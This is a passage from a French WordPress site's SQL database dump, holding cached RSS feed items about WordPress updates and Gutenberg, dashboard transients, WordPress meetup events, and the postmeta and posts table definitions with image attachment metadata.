?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/XQD1O4eQIKg/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:121:\"https://wpmarmite.com/mise-a-jour-wordpress/?utm_source=rss&#038;utm_medium=rss&%23038;utm_campaign=mise-a-jour-wordpress\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Dec 2018 07:00:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:303:\"\n		        \n“Mais qu’est-ce qui m’a pris de faire ça ?” Avec le recul, c’est la question que je me suis posée en repensant à mes premières mises à jour sur WordPress....\nL’article Comment faire vos mises à jour WordPress sans encombres ? est apparu en premier sur WP Marmite.		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"WP Marmite\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:680:\"<p><img width=\"1500\" height=\"750\" src=\"https://wpmarmite.com/wp-content/uploads/2018/12/maj-wordpress.jpg\" class=\"attachment-full size-full wp-post-image\" alt=\"\" /></p>\n<p>“Mais qu’est-ce qui m’a pris de faire ça ?” Avec le recul, c’est la question que je me suis posée en repensant à mes premières mises à jour sur WordPress....</p>\n<p>L’article <a rel=\"nofollow\" href=\"https://wpmarmite.com/mise-a-jour-wordpress/\">Comment faire vos mises à jour WordPress sans encombres ?</a> est apparu en premier sur <a rel=\"nofollow\" href=\"https://wpmarmite.com\">WP Marmite</a>.</p><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/XQD1O4eQIKg\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:121:\"https://wpmarmite.com/mise-a-jour-wordpress/?utm_source=rss&#038;utm_medium=rss&%23038;utm_campaign=mise-a-jour-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WordPress 5.0 et Gutenberg : un changement de philosophie ?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/3trqh6jq79k/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://www.seomix.fr/wordpress-5-0-gutenberg-changement-de-philosophie/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Dec 2018 09:29:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1173:\"\n		        WordPress 5.0 est sortie en Décembre avec son nouvel éditeur de contenus: Gutenberg. Le lancement chaotique a notamment été décrié par une partie de la communauté. Cette nouvelle version majeur a fait grincé des dents, voici pourquoi !Accédez à l\'article original : WordPress 5.0 et Gutenberg&nbsp;: un changement de philosophie&nbsp;?.\n    Voici le début du contenu : WordPress 5.0 est sorti le 6 décembre dernier. Comme toute version majeure, elle apporte son lot de nouveautés. Et l’une d&rsquo;elles est particulièrement visible&nbsp;: Gutenberg, un tout nouvel éditeur pour rédiger les contenus, éditeur qui vient remplacer automatiquement l&rsquo;ancien TinyMCE.  Remarque préalable Avant de lire cet article, il est important de lire ce passage. Cet article n&rsquo;a pas pour but de venir critiquer WordPress, ni Gutenberg, ni toutes les personnes qui ont participé à cette nouvelle version du CMS. Il ne s&rsquo;agit ici que d&rsquo;un point de vue personnel sur ce qui vient de se passer et sur le futur du CMS. L&rsquo;objectif est de pouvoir dresser le bilan de la sortie de cette dernière version, de la façon [...]		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1608:\"<div><img class=\"webfeedsFeaturedVisual\" src=\"https://www.seomix.fr/wp-content/uploads/2018/12/blocs-gutenberg-500x476.jpg\" /></div>WordPress 5.0 est sortie en Décembre avec son nouvel éditeur de contenus: Gutenberg. Le lancement chaotique a notamment été décrié par une partie de la communauté. Cette nouvelle version majeur a fait grincé des dents, voici pourquoi !<p><strong>Accédez à l\'article original :</strong> <a href=\"https://www.seomix.fr/wordpress-5-0-gutenberg-changement-de-philosophie/\">WordPress 5.0 et Gutenberg&nbsp;: un changement de philosophie&nbsp;?</a>.</p>\n    <p><strong>Voici le début du contenu :</strong> <p><strong>WordPress 5.0</strong> est sorti le 6 décembre dernier. Comme toute version majeure, elle apporte son lot de nouveautés. Et l’une d&rsquo;elles est particulièrement visible&nbsp;: <strong>Gutenberg</strong>, un tout nouvel éditeur pour rédiger les contenus, éditeur qui vient remplacer automatiquement l&rsquo;ancien TinyMCE.</p>  <p><strong>Remarque préalable</strong></p> <p>Avant de lire cet article, <strong>il est important de lire ce passage</strong>.</p> <p>Cet article n&rsquo;a pas pour but de venir critiquer WordPress, ni Gutenberg, ni toutes les personnes qui ont participé à cette nouvelle version du CMS. Il ne s&rsquo;agit ici que d&rsquo;un point de vue personnel sur ce qui vient de se passer et sur le futur du CMS. L&rsquo;objectif est de pouvoir dresser le bilan de la sortie de cette dernière version, de la façon [...]</p><hr /><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/3trqh6jq79k\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://www.seomix.fr/wordpress-5-0-gutenberg-changement-de-philosophie/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"Focus métier : le délégué à la protection des données (DPO)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/lWH6I4wJ_rw/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://www.wpnormandie.fr/focus-metier-le-delegue-a-la-protection-des-donnees-dpo/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Dec 2018 08:57:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:417:\"\n		        Le Règlement Général sur la Protection des Données («&#160;RGPD&#160;»), d’application obligatoire depuis le 25 mai dernier a créé un nouvel acteur dans l’univers des données personnelles*, le Délégué à la Protection des Données – ou Data Protection Officer en anglais – («&#160;DPO&#160;»). Ce dernier est présenté comme un acteur clef du processus de mise en [&#8230;]		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:487:\"Le Règlement Général sur la Protection des Données («&#160;RGPD&#160;»), d’application obligatoire depuis le 25 mai dernier a créé un nouvel acteur dans l’univers des données personnelles*, le Délégué à la Protection des Données – ou Data Protection Officer en anglais – («&#160;DPO&#160;»). Ce dernier est présenté comme un acteur clef du processus de mise en [&#8230;]<img src=\"http://feeds.feedburner.com/~r/wpfr/~4/lWH6I4wJ_rw\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://www.wpnormandie.fr/focus-metier-le-delegue-a-la-protection-des-donnees-dpo/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:52:\"http://backend.userland.com/creativeCommonsRssModule\";a:1:{s:7:\"license\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://creativecommons.org/licenses/by-nc-sa/3.0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:2:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";s:4:\"href\";s:32:\"http://feeds.feedburner.com/wpfr\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:3:\"rel\";s:3:\"hub\";s:4:\"href\";s:32:\"http://pubsubhubbub.appspot.com/\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:4:\"info\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:3:\"uri\";s:4:\"wpfr\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:11:{s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"etag\";s:27:\"BVprbGn78+slrAPEVE1tNtOIoo4\";s:13:\"last-modified\";s:29:\"Sun, 30 Dec 2018 11:56:49 GMT\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"date\";s:29:\"Sun, 30 Dec 2018 12:04:36 GMT\";s:7:\"expires\";s:29:\"Sun, 30 Dec 2018 12:04:36 GMT\";s:13:\"cache-control\";s:18:\"private, max-age=0\";s:22:\"x-content-type-options\";s:7:\"nosniff\";s:16:\"x-xss-protection\";s:13:\"1; mode=block\";s:6:\"server\";s:3:\"GSE\";s:7:\"alt-svc\";s:40:\"quic=\":443\"; ma=2592000; v=\"44,43,39,35\"\";}}s:5:\"build\";s:14:\"20180902130703\";}', 'no'),
(183, 'nav_menu_options', 'a:1:{s:8:\"auto_add\";a:0:{}}', 'yes'),
(229, '_transient_timeout_feed_mod_76f8d9281c01f21e505004d0986f50c6', '1546214676', 'no'),
(230, '_transient_feed_mod_76f8d9281c01f21e505004d0986f50c6', '1546171476', 'no'),
(231, '_transient_timeout_dash_v2_9e13cf07c40e661fd75eabc0ef40866b', '1546214676', 'no'),
(232, '_transient_dash_v2_9e13cf07c40e661fd75eabc0ef40866b', '<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/WordpressFrancophone/~3/BFWuQgyALjg/\'>Think WP, le documentaire vidéo sur WordPress enfin disponible !</a></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/wpfr/~3/mxn85Rp8tWk/\'>Installer WordPress en 3 minutes !</a></li><li><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/wpfr/~3/penBqnXRVWY/\'>Créer vos blocs Gutenberg facilement avec Carbon Fields</a></li><li><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/wpfr/~3/C5RZVcPhyRo/\'>Installer WordPress sur un NAS Synology</a></li></ul></div>', 'no'),
(233, '_site_transient_timeout_community-events-36feac2e7ea4a3a924883369508b905a', '1546214677', 'no'),
(234, '_site_transient_community-events-36feac2e7ea4a3a924883369508b905a', 'a:2:{s:8:\"location\";a:1:{s:2:\"ip\";s:12:\"62.235.238.0\";}s:6:\"events\";a:5:{i:0;a:7:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:24:\"WordPress Meetup Antwerp\";s:3:\"url\";s:65:\"https://www.meetup.com/Antwerp-WordPress-Meetup/events/255361402/\";s:6:\"meetup\";s:24:\"Antwerp WordPress Meetup\";s:10:\"meetup_url\";s:48:\"https://www.meetup.com/Antwerp-WordPress-Meetup/\";s:4:\"date\";s:19:\"2019-01-17 19:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:18:\"Antwerpen, Belgium\";s:7:\"country\";s:2:\"be\";s:8:\"latitude\";d:51.22153999999999740566636319272220134735107421875;s:9:\"longitude\";d:4.404550000000000409272615797817707061767578125;}}i:1;a:7:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:26:\"WordPress meetup Eindhoven\";s:3:\"url\";s:67:\"https://www.meetup.com/WordPress-Meetup-Eindhoven/events/257156203/\";s:6:\"meetup\";s:26:\"WordPress Meetup Eindhoven\";s:10:\"meetup_url\";s:50:\"https://www.meetup.com/WordPress-Meetup-Eindhoven/\";s:4:\"date\";s:19:\"2019-01-28 19:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:22:\"Eindhoven, Netherlands\";s:7:\"country\";s:2:\"nl\";s:8:\"latitude\";d:51.43314000000000163481672643683850765228271484375;s:9:\"longitude\";d:5.43206300000000030792079996899701654911041259765625;}}i:2;a:7:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:13:\"WPinLille #27\";s:3:\"url\";s:50:\"https://www.meetup.com/WPinLille/events/256836737/\";s:6:\"meetup\";s:9:\"WPinLille\";s:10:\"meetup_url\";s:33:\"https://www.meetup.com/WPinLille/\";s:4:\"date\";s:19:\"2019-02-06 19:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:13:\"Lille, France\";s:7:\"country\";s:2:\"fr\";s:8:\"latitude\";d:50.636425000000002683009370230138301849365234375;s:9:\"longitude\";d:3.0608360000000001122089088312350213527679443359375;}}i:3;a:7:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:24:\"WordPress Meetup Antwerp\";s:3:\"url\";s:65:\"https://www.meetup.com/Antwerp-WordPress-Meetup/events/255361408/\";s:6:\"meetup\";s:24:\"Antwerp WordPress Meetup\";s:10:\"meetup_url\";s:48:\"https://www.meetup.com/Antwerp-WordPress-Meetup/\";s:4:\"date\";s:19:\"2019-02-18 19:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:18:\"Antwerpen, Belgium\";s:7:\"country\";s:2:\"be\";s:8:\"latitude\";d:51.22153999999999740566636319272220134735107421875;s:9:\"longitude\";d:4.404550000000000409272615797817707061767578125;}}i:4;a:7:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:26:\"WordPress meetup Eindhoven\";s:3:\"url\";s:67:\"https://www.meetup.com/WordPress-Meetup-Eindhoven/events/257156213/\";s:6:\"meetup\";s:26:\"WordPress Meetup Eindhoven\";s:10:\"meetup_url\";s:50:\"https://www.meetup.com/WordPress-Meetup-Eindhoven/\";s:4:\"date\";s:19:\"2019-02-25 19:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:22:\"Eindhoven, Netherlands\";s:7:\"country\";s:2:\"nl\";s:8:\"latitude\";d:51.43314000000000163481672643683850765228271484375;s:9:\"longitude\";d:5.43206300000000030792079996899701654911041259765625;}}}}', 'no');

-- --------------------------------------------------------

--
-- Structure de la table `ct_postmeta`
--

CREATE TABLE `ct_postmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `post_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `ct_postmeta`
--

INSERT INTO `ct_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1, 2, '_wp_page_template', 'default'),
(8, 9, '_menu_item_menu_item_parent', '0'),
(3, 4, '_customize_changeset_uuid', 'fb55db87-926a-4c2d-8fff-6df12b5c1589'),
(7, 9, '_menu_item_type', 'post_type'),
(5, 5, '_customize_changeset_uuid', 'fb55db87-926a-4c2d-8fff-6df12b5c1589'),
(9, 9, '_menu_item_object_id', '4'),
(10, 9, '_menu_item_object', 'page'),
(11, 9, '_menu_item_target', ''),
(12, 9, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(13, 9, '_menu_item_xfn', ''),
(14, 9, '_menu_item_url', ''),
(15, 10, '_menu_item_type', 'post_type'),
(16, 10, '_menu_item_menu_item_parent', '0'),
(17, 10, '_menu_item_object_id', '5'),
(18, 10, '_menu_item_object', 'page'),
(19, 10, '_menu_item_target', ''),
(20, 10, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(21, 10, '_menu_item_xfn', ''),
(22, 10, '_menu_item_url', ''),
(43, 18, '_wp_attached_file', '2018/09/dp.png'),
(44, 18, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:374;s:6:\"height\";i:376;s:4:\"file\";s:14:\"2018/09/dp.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"dp-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"dp-298x300.png\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"zerif-post-thumbnail\";a:4:{s:4:\"file\";s:14:\"dp-250x250.png\";s:5:\"width\";i:250;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"zerif-post-thumbnail-large-table\";a:4:{s:4:\"file\";s:14:\"dp-374x300.png\";s:5:\"width\";i:374;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:33:\"zerif-post-thumbnail-large-mobile\";a:4:{s:4:\"file\";s:14:\"dp-374x200.png\";s:5:\"width\";i:374;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"zerif_project_photo\";a:4:{s:4:\"file\";s:14:\"dp-285x214.png\";s:5:\"width\";i:285;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"zerif_our_team_photo\";a:4:{s:4:\"file\";s:14:\"dp-174x174.png\";s:5:\"width\";i:174;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(45, 19, '_edit_lock', '1535908922:1'),
(46, 20, '_wp_attached_file', '2018/09/jl.png'),
(47, 20, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:376;s:6:\"height\";i:376;s:4:\"file\";s:14:\"2018/09/jl.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"jl-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"jl-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"zerif-post-thumbnail\";a:4:{s:4:\"file\";s:14:\"jl-250x250.png\";s:5:\"width\";i:250;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"zerif-post-thumbnail-large-table\";a:4:{s:4:\"file\";s:14:\"jl-376x300.png\";s:5:\"width\";i:376;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:33:\"zerif-post-thumbnail-large-mobile\";a:4:{s:4:\"file\";s:14:\"jl-376x200.png\";s:5:\"width\";i:376;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"zerif_project_photo\";a:4:{s:4:\"file\";s:14:\"jl-285x214.png\";s:5:\"width\";i:285;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"zerif_our_team_photo\";a:4:{s:4:\"file\";s:14:\"jl-174x174.png\";s:5:\"width\";i:174;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(48, 21, '_wp_attached_file', '2018/09/mh.png'),
(49, 21, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:722;s:6:\"height\";i:726;s:4:\"file\";s:14:\"2018/09/mh.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"mh-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"mh-298x300.png\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"zerif-post-thumbnail\";a:4:{s:4:\"file\";s:14:\"mh-250x250.png\";s:5:\"width\";i:250;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"zerif-post-thumbnail-large\";a:4:{s:4:\"file\";s:14:\"mh-722x500.png\";s:5:\"width\";i:722;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"zerif-post-thumbnail-large-table\";a:4:{s:4:\"file\";s:14:\"mh-600x300.png\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:33:\"zerif-post-thumbnail-large-mobile\";a:4:{s:4:\"file\";s:14:\"mh-400x200.png\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"zerif_project_photo\";a:4:{s:4:\"file\";s:14:\"mh-285x214.png\";s:5:\"width\";i:285;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"zerif_our_team_photo\";a:4:{s:4:\"file\";s:14:\"mh-174x174.png\";s:5:\"width\";i:174;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}');

-- --------------------------------------------------------

--
-- Structure de la table `ct_posts`
--

CREATE TABLE `ct_posts` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `post_author` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `ct_posts`
--

INSERT INTO `ct_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
